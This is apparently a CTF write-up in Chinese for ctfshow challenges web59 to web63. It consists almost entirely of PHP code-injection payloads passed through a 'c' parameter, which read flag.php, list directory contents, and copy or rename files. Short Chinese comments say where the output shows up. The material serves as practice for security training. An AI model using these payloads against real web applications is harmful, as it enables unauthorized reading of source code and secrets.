1.web59
payload:
最后三个payload读取的内容显示在了网站源代码中
c=show_source("flag.php");
c=highlight_file("flag.php");
c=var_dump(file("flag.php"));
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgets($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetc($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetcsv($a);echo var_dump($line);}
2.web60
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetc($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetcsv($a);echo var_dump($line);}
copy("flag.php","flag.txt");
rename("flag.php","flag.txt");
3.web61
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件";
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));
4.web62
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件"
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));
5.web63
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件"
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));
参考文章:
ctfshow命令执行